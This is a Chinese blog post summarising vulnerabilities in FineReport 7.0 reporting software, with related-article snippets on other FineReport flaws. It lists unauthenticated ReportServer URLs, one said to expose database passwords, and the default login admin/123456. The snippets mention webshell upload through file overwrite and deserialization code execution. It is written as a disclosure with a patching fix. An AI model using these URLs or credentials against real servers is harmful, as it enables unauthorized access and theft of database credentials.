帆软报表漏洞总结

已于 2022-10-09 10:27:52 修改
阅读量8k 收藏 3
点赞数 2
文章标签: 网络 安全 web安全
于 2022-09-05 10:53:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51345872/article/details/126699712
版权

一、漏洞背景

FineReport报表软件是帆软软件(中国)公司自主研发的一款纯Java编写的企业级web报表软件。主要针对2012年7.0版本存在一些安全漏洞问题。

二、版本查看

  • 弱口令漏洞提供了访问此页面方法
    在这里插入图片描述

三、漏洞总结

1.未授权访问漏洞

http://ip/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false //未授权访问内网ip的日志
http://ip/ReportServer?op=fr_server&cmd=sc_version_info&showtoolbar=false //未授权访问重置授权
http://ip/ReportServer?op=fr_server&cmd=sc_getconnectioninfo //未授权查看数据库密码

在这里插入图片描述在这里插入图片描述2.默认弱口令

  • 访问https://ip/ReportServer,点击服务器管理平台进入后台页面
    在这里插入图片描述
  • 默认密码为弱口令admin/123456
    在这里插入图片描述

四、漏洞修复

更新帆软报表的版本

  • 目前仅为本人自己遇见的一些情况,后续若遇到新的poc或者exp会进行及时更新,恳请大佬师傅们提成建议!
仅供学习参考使用!!若厂商有使用此版本,自行查验,及时联系官方进行更新!!
Web摆烂人
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
帆软数据决策系统漏洞_帆软报表漏洞总结
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-24 2986
一、帆软数据决策系统漏洞背景,FineReport报表软件是帆软软件(中国)公司自主研发的一款纯Java编写的企业级web报表软件。主要针对2012年7.0版本存在一些安全漏洞问题。 二、帆软数据决策系统漏洞版本查看弱口令漏洞提供了访问此页面方法 三、帆软数据决策系统漏洞漏洞总结 1.未授权访问漏洞 http://ip/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false //未授权访问内网ip的日志 http://ip/Repo
springboot整合帆软报表案例
01-19
该案例整合了java流行框架springboot和报表制作工具帆软,帆软版本10.0,内附整合文档,有问题可以咨询QQ:361440206 整合项目介绍:https://blog.csdn.net/qq_39408914/article/details/100765504
帆软报表 V8.0 组合拳漏洞分析及复现
2301_80115097的博客
12-15 951
FineReport是一款企业级报表设计和数据可视化软件,纯Java编写的企业级web报表工具。它提供了强大的报表设计、数据分析和数据可视化功能,旨在帮助企业用户轻松地创建高质量的报表和数据分析图表。
帆软 FineReport/FineBI channel反序列化漏洞分析
errorr0
07-18 1万+
漏洞分析
solly0880#wiki#帆软 V9 任意文件覆盖文件上传1
07-25
帆软 V9 任意文件覆盖文件上传漏洞描述帆软 V9 存在任意文件覆盖,导致攻击者可以任意文件上传漏洞影响帆软 V9漏洞复现。
帆软(FineReport) V9任意文件覆盖漏洞
热门推荐
江左盟的博客
05-03 2万+
目录 漏洞简介 影响范围 漏洞分析 漏洞利用 修复方法 批量漏洞检测工具 漏洞简介 该漏洞是在近期HVV中被披露的,由于在初始化svg文件时,未对传入的参数做限制,导致可以对已存在的文件覆盖写入数据,从而通过将木马写入jsp文件中获取服务器权限。 影响范围 WebReport V9 漏洞分析 fr-chart-9.0.jar包中com.fr.chart.web/ChartSvgInitService类传递op参数的值svginit: 漏洞主要出现在fr-chart-9.0.
帆软V9任意文件覆盖漏洞+无损上传
网络安全。
01-15 801
由于WebReport V9在安装之后在WebReport目录下存在update.jsp和update1.jsp,因此可以构造payload直接覆盖这两个文件的内容,从而GetShell。要由chartmapsvg开头,包含.svg时会先创建文件,然后再到后续逻辑,所以只需要xxx.svg.jsp这种格式,不需要覆盖原有文件即可无损利用成功。上传其他 webshell 同理,建议哥斯拉、冰蝎等等。注意:木马的双引号要转义一下。
帆软报表 V8 get_geo_json 任意文件读取漏洞
huangyongkang666的博客
01-25 5562
帆软报表 V8 get_geo_json 任意文件读取漏洞 CNVD-2018-04757
帆软 V9 Getshell 漏洞
swordheart的博客
07-08 5313
0x00 任意文件上传漏洞【FineReport V9】0x01 漏洞描述此漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 JSP 文件进行覆盖,寻找Tomcat 启动帆软后默认存在的 JSP 文件0x02 漏洞详情 payload 替换成冰蝎的马,即可getshell0x03 临时修复建议排查是否使用帆软系统,并同步在AF自定义禁止访问webroot/ReportServer路径。...
帆软报表 channel 反序列化漏洞复现
0xSec
11-27 2874
帆软FineReport、FineBI 存在反序列化漏洞,攻击者可向 /webroot/decision/remote/design/channel 接口发送精心构造的反序列化数据,在目标服务器上执行任意代码,获取服务器权限。
帆软报表使用jar包
11-10
这里web项目使用帆软报表要使用的jar包,有8版本和9版本,看自己需要引入。
帆软报表查询性能sql分析插件
06-20
帆软报表查询性能sql分析插件、可优化sql,显示sql查询快慢,每个单元格的计算时间
帆软报表Oracle存储过程解决storeParameter1参数试用插件
12-12
帆软报表调用Oracle存储过程如果存储过程定义中没有参数,但是设计器中缺弹出一个storeParameter1参数的解决插件
FineReport帆软报表培训 视频
04-29
FineReport是中国报表软件知名品牌,合作客户多、市场占有率高、行业经验丰富,借助FineReport简单无码、高效灵活、稳定。视频为帆软报表培训教学。
SD-WAN怎样保障网络稳定
TIANGEKUAJING的博客
04-25 549
随着企业网络的日益复杂,如何确保线路的稳定性和高效性成为了网络管理的一大挑战。尤其是在线路出现故障、质量下降或拥塞时,如何快速响应并切换到最佳线路,就显得尤为重要。SD-WAN,作为一种新型的网络架构,为用户提供了灵活应对各种网络问题的能力。
用asio::tcp通信的服务端
qq_36314864的博客
04-26 226
第三方库下载地址:https://download.csdn.net/download/qq_36314864/89227706。代码下载地址:https://download.csdn.net/download/qq_36314864/89227693。
前端调用WebSocket协议接口获取数据
最新发布
m0_56023096的博客
04-29 146
createWs("测试数据", (res) => {
观成科技:蔓灵花组织加密通信研究分析总结
GCKJ_0824的博客
04-23 1051
首先,我们采用基于规则的检测方法 ,在面对简单的明文通信和已知密钥加密的工具时,对其流量中的关键字符串,比如url、固定密钥加密的16进制字符进行匹配。在面对较为复杂的攻击武器通信加密的流量时,针对已知密钥的情况,可以利用已掌握的密钥规律进行解密尝试。对于未知密钥的加密流量,我们可以通过统计流量数据在时间、空间上的分布情况,对蔓灵花组织的每款工具制定行为模型,例如统计流量中的心跳时间间隔,载荷的数据格式,以及流量中上下行数据的关系,来判断是否符合蔓灵花组织某一攻击武器的流量通信行为特征。
【Docker】Docker的网络与资源控制
Mo_nor的博客
04-26 910
直接使用bridge模式,是无法支持指定IP运行docker的,例如执行以下命令就会报错可以先定义网络,再使用指定IP运行docker#docker1 为执行 ifconfig -a 命令时,显示的网卡名,如果不使用 --opt 参数指定此名称,那你在使用 ifconfig -a 命令查看网络信息时,看到的是类似 br-110eb56a0b22 这样的名字,这显然不怎么好记。#mynetwork 为执行 docker network list 命令时,显示的bridge网络模式名称。
帆软报表channel反序列化漏洞
12-09
帆软报表是一款企业级报表设计、生成和发布软件。它提供了丰富的数据展现和统计分析功能,广泛应用于各个行业的数据报表处理中。 而帆软报表channel反序列化漏洞是指在使用帆软报表软件时,由于未对用户输入的渠道配置信息进行正确的反序列化验证,导致恶意攻击者可以构造恶意渠道配置数据,以此来获取或篡改系统中的敏感信息,或者执行一些危害系统安全的操作。 该漏洞的原因主要是由于帆软报表软件在处理渠道配置信息时,没有对用户输入的数据进行充分的验证和过滤。攻击者可以通过构造恶意的渠道配置文件,包含恶意代码或者可以触发一些未被预料到的漏洞行为,从而获取系统权限或者进行其他恶意操作。 要解决这个漏洞问题,首先需要帆软报表软件方面加强对用户输入的渠道配置信息的验证和过滤。包括对输入数据进行严格的反序列化限制,验证渠道配置文件的合法性和完整性,确保渠道配置文件中不存在恶意代码或者其他危险操作。 同时,用户在使用帆软报表软件时也应当注意保持软件及时更新,避免使用非官方渠道配置文件,以及加强系统的安全管理,限制不必要的系统权限,提高系统的安全性。 总之,帆软报表channel反序列化漏洞是一种安全风险,需要软件提供商和用户共同努力来进行修复和加强防护措施,以保障系统数据的安全性和完整性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值